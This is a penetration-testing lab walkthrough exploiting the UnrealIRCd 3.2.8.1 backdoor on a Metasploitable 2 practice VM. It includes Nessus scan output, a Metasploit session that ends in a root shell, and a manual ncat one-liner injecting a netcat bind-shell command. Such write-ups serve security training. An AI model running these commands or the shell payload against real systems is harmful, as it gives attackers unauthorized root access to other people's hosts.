The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
UnreaIRCD is an Internet Relay Chat service.
This exploit has been made nice and easy for us:
On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor that went unnoticed for months – triggered by sending the letters “AB” following by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.
The Nessus scan reported:
Port 6667/tcp
46882 – UnrealIRCd Backdoor Detection [-/+]
Synopsis
The remote IRC server contains a backdoor.Description
The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host.See Also
http://seclists.org/fulldisclosure/2010/Jun/277
http://seclists.org/fulldisclosure/2010/Jun/284
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txtSolution
Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.Risk Factor
CriticalCVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)References
BID 40820
CVE CVE-2010-2075
XREF OSVDB:65445Exploitable with
CANVAS (true)Metasploit (true)Plugin Information:
Publication date: 2010/06/14, Modification date: 2013/02/06
Ports
tcp/6667The remote IRC server is running as :
uid=0(root) gid=0(root)
As this Nessus scan advises us that this is exploitable via Metasploit, let’s give it a go:
msf > search ircd [!] Database not connected or cache not built, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > show options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 6667 yes The target port Exploit target: Id Name -- ---- 0 Automatic Target msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.103 RHOST => 192.168.1.103 msf exploit(unreal_ircd_3281_backdoor) > exploit [*] Started reverse double handler [*] Connected to 192.168.1.103:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... [*] Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo kt8lsphf0nxKGdOA; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "kt8lsphf0nxKGdOA\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:39851) at 2013-11-20 12:33:44 +0000 whoami root
Success.
As this exploit is triggered by sending the letters “AB” following by a system command to the server on any listening port, we can achieve root manually using Ncat. In the Terminal we input:
# echo "AB;nc -l -e /bin/sh -p 12345" | ncat 192.168.1.103 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached)
Then we open Ncat and connect to the backdoor using another terminal:
# ncat 192.168.1.103 12345
whoami
root
Job done.